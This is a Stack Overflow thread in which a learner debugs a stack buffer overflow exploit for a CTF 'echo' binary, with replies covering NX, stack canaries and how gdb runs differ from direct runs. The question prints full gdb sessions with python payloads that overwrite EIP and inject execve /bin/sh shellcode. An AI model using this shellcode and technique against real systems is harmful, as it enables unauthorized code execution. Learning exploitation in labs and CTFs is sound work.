current community

your communities

more stack exchange communities

company blog
Stack Exchange Inbox Reputation and Badges
tour help
Join the Stack Overflow Community
Stack Overflow is a community of 6.5 million programmers, just like you, helping each other.
Join them; it only takes a minute:
Sign up
up vote 0 down vote favorite

I'm trying to learn how buffer overflows work and how this can be used. I'm solving a simple challenge (backdoorlabs echo challenge) by trying to exploit a supplied binary file.

(see: http://hack.bckdr.in/ECHO/echo)

I think I'm doing everything right (accoring to the guides and tutorials I have been reading) but still it is not working and driving me crazy for hours now already.

The bufferoverflow lets me over write the next instruction (eip).

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"')    

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

So I'm able to overwrite the next eip, now lets add some 21 bytes shell code which spawns a shell and try to find the address where it is.

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $sp
0xbffff750:     0xe1f7c931      0x2f2f6851      0x2f686873      0x896e6962
0xbffff760:     0xcd0bb0e3      0xbfff0080      0xbffff80c      0xb7fff3d0
0xbffff770:     0x08048480      0xffffffff      0x0012efc4      0x080482d8
0xbffff780:     0x00000001      0xbffff7c0      0x0011eb25      0x0012fab0

Bingo the shellcode is right here loaded at 0xbffff750, so that is the adress we want to adress the eip to..

Until now everything looks right to me so I try it with the right values found.

(gdb) run <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0xbffff750 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.192.el6.i686
(gdb)


(gdb) x/i $eip
=> 0xbffff750:  xor    %ecx,%ecx
(gdb)

The eip got changed to the right adress and the shellcode is in place however when i try it in my shell it does not work and still segfaults as you can see.

[rick@TESTBOX tmp]$ ./vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀
Segmentation fault
[rick@TESTBOX tmp]$

Anyone here has some thoughts about this, sees an error or has any other ideas ? As mentioned I'm a newbie trying to understand the basic principles and obviously I'm doing something wrong.

share|improve this question
    
I think the binary is compiled with stack protection probably ? – skanilos yesterday
    
Is this something standard used by the gcc compiler ? – skanilos yesterday
    
It's done by most modern operating systems, to prevent these types of exploits. You have to use special options to disable it. – Barmar yesterday
    
Ok did this and the Seg error disapperead but still no shell is spawning.. any clues ? – skanilos yesterday
1  
This binary is NX enabled. You can't exploit it by using shellcode. You could check protection by this tool. – bananaappletw yesterday
up vote 0 down vote accepted

I think your problem is:

there is a difference between the real execution of a program and the gdb-controlled one.

You need to

  1. predict this difference. And this question gives an example how to do it.

OR

  1. I alse faced your problem months before. At that time, I observed this difference. But I did not use this way to find the difference, instead, I used the brute force way exampled in The Art of Exploitation 0x331: try different offsets with a shell script.

This question might help you in the future, which tells you how to turn off some security functions to allow you to attack.

share|improve this answer
    
Thanks for your answer, it makes sense for me. Just an idea, if I would change the shellcode to echo to some file instead of a shell then when executed right in gdb it should have echo to the file, correct ? – skanilos 15 hours ago
    
I also want to mention that bananaappletw is also right because this binary has some protections (like stack execution protection which causes the segfault I believe). I used my own source and compiled it without any protections and indeed stumbled into the problem you are describing. – skanilos 15 hours ago
    
@skanilos I think it should work, but the shellcode to echo to a file may be much more complicated.Yes, the stack – 周耀阳 5 hours ago
    
Yes, the stack guard is enabled by default in gcc, so you need to disable it to attack. – 周耀阳 5 hours ago

Your Answer

 
discard

By posting your answer, you agree to the privacy policy and terms of service.

Not the answer you're looking for? Browse other questions tagged or ask your own question.